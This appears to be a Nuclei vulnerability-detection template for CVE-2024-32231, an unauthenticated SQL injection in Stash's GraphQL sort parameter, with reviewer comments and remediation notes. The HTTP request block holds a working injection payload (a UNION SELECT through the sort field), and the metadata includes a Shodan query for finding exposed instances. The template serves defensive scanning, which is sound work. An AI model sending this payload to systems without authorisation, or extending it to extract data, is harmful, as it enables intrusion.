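# Detection template for CVE-2024-32231: SQL injection through the `sort`
# field of the GraphQL FindPerformers filter in Stash releases before 0.26.0.
# The probe only asks the database for its SQLite version and relies on the
# resulting type-conversion error being echoed back in the response body.
id: CVE-2024-32231

info:
  name: Stash < 0.26.0 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Stash up to v0.25.1 was discovered to contain a SQL injection vulnerability via the sort parameter.
  # Added in review: the template title marks 0.26.0 as the first unaffected
  # release; see the pull request and advisory under `reference`.
  remediation: |
    Upgrade Stash to version 0.26.0 or later.
  reference:
    - https://github.com/stashapp
    - https://github.com/stashapp/stash
    - https://github.com/stashapp/stash/pull/4865
    - https://github.com/advisories/GHSA-75jf-52jg-qqh4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32231
  classification:
    cve-id: CVE-2024-32231
    # Added in review: CWE-89 is the generic SQL injection weakness class.
    cwe-id: CWE-89
    epss-score: 0.00045
    epss-percentile: 0.16348
  metadata:
    verified: true
    max-request: 1
    # Quoted so the embedded colon and double quotes are always read as one
    # string; the value itself is unchanged.
    shodan-query: 'html:"<title>Stash</title>"'
  tags: cve,cve2024,stash,sqli

# A single POST to /graphql, sent without any cookie or authorization header.
# NOTE(review): an instance that enforces login will presumably reject this
# request, so a non-match does not prove the instance is patched. Confirm
# the installed version before closing a finding.
http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-type: application/json

        {"operationName":"FindPerformers","variables":{"filter":{"q":"","page":1,"per_page":40,"sort":"name;select performers.id FROM performers union select group_concat(sqlite_version(),':')-- -","direction":"ASC"},"performer_filter":{}},"query":"query FindPerformers($filter: FindFilterType, $performer_filter: PerformerFilterType, $performer_ids: [Int!]) {\n findPerformers(\n filter: $filter\n performer_filter: $performer_filter\n performer_ids: $performer_ids\n ) {\n count\n performers {\n ...PerformerData\n __typename\n }\n __typename\n }\n}\n\nfragment PerformerData on Performer {\n id\n name\n disambiguation\n url\n gender\n twitter\n instagram\n birthdate\n ethnicity\n country\n eye_color\n height_cm\n measurements\n fake_tits\n penis_length\n circumcised\n career_length\n tattoos\n piercings\n alias_list\n favorite\n ignore_auto_tag\n image_path\n scene_count\n image_count\n gallery_count\n movie_count\n performer_count\n o_counter\n tags {\n ...SlimTagData\n __typename\n }\n stash_ids {\n stash_id\n endpoint\n __typename\n }\n rating100\n details\n death_date\n hair_color\n weight\n __typename\n}\n\nfragment SlimTagData on Tag {\n id\n name\n aliases\n image_path\n parent_count\n child_count\n __typename\n}"}

    # All three matchers must hold for a finding.
    matchers-condition: and
    matchers:
      # The error text echoes the value that failed integer conversion. The
      # pattern expects that value to start with "3" (a SQLite 3.x version
      # string) between JSON-escaped quotes.
      - type: regex
        part: body
        regex:
          - 'converting driver\.Value type string \(\\"3.*?\\"\) to a int: invalid syntax'

      # Restricts matches to JSON responses.
      - type: word
        part: content_type
        words:
          - "application/json"

      # The error is expected inside a 200 response, not as an HTTP error.
      - type: status
        status:
          - 200
# NOTE(review): the digest below was issued for the upstream template text.
# Any edit to this file, including the review additions above, means the
# template has to be re-signed before signature verification will pass.
# digest: 4a0a004730450220050c749c3ba06d60772154ce48de57b3a0d290fcaaf27dbd684928899030cde2022100f6b810750d37cafffe2ac67cd6b6cadbf75cff92bcbfaba3b1036fff701152d9:922c64590222798bb761d5b6d8e72950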